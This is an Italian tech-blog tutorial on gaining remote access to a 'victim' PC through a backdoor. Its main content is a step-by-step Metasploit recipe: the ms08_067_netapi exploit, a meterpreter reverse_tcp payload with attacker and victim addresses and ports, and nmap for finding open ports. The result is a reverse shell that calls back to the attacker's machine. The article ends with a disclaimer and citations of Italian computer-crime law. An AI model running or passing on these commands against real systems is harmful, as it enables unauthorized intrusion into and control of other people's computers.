
Creare una backdoor per accedere ad un altro PC
Abbiamo discusso già alcune volte sui vari modi esistenti per riuscire ad entrare in dispositivi remoti. In alcuni articoli precedenti, infatti, vi ho parlato dell’esistenza di alcuni metodi per accedere a computer da remoto semplicemente utilizzando una backdoor; ma di metodo non ne esiste solo uno, anzi, ci sono numerosissimi modi per riuscire a crearsi “una porta” di accesso all’interno di un dispositivo di cui non avete alcun controllo fisico. Questa”porta di accesso” o, meglio chiamata, backdoor, è uno dei principali mezzi utilizzati dagli hacker per riuscire a prendere possesso di una macchina remota; il principio di funzionamento è abbastanza intuitivo: l’attaccante innanzitutto deve sapere l’indirizzo IP del dispositivo di cui vuole impadronirsi, individua le principali vulnerabilità del sistema remoto, da un’occhiata alle porte aperte del PC, e con qualche comando riesce ad aprirsi quello spazio che permette la comunicazione tra il computer dell’hacker e quello della vittima; possiamo dire che nonostante tutti siano dotati degli ultimissimi software all’avanguardia per proteggersi da questo genere di attacchi, nessuno può sentirsi realmente al sicuro; quasi tutti i sistemi informatici sono affetti da falle di sicurezza che compromettono quotidianamente la nostra sicurezza in ambiente virtuale. Ma adesso torniamo a noi; se sei interessato su come creare una backdoor per accedere ad un PC remoto non devi far altro che seguire questa guida; testate questo procedimento soltanto sui vostri dispositivi, in quanto manomettere la privacy altrui è un reato. Cominciamo! Per svolgere queste operazioni utilizzeremo Kali Linux, uno dei più completi e funzionali dei sistemi operativi specializzati nel penetration test.
Seguono in ordine tutte le azioni che andremo a svolgere passo dopo passo:
-Apriamo un terminale e digitiamo “msfconsole”
-use windows/smb/ms08_067_netapi
-set payload windows/meterpreter/reverse_tcp
-set lhost (indirizzo IP locale)
N.B: come porta vi consiglio la 443
-set lport
-set rhost (indirizzo IP vittima)
-set rport (porta vittima)
N.B: per individuare le porte aperte potete eseguire su un altro terminale il comando “nmap “indirizzo IP vittima”
-exploit
Dopo questo passaggio avrete completato l’exploit e potete conoscere tutte le azioni possibili digitando il comando “help”
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera o sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella, dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI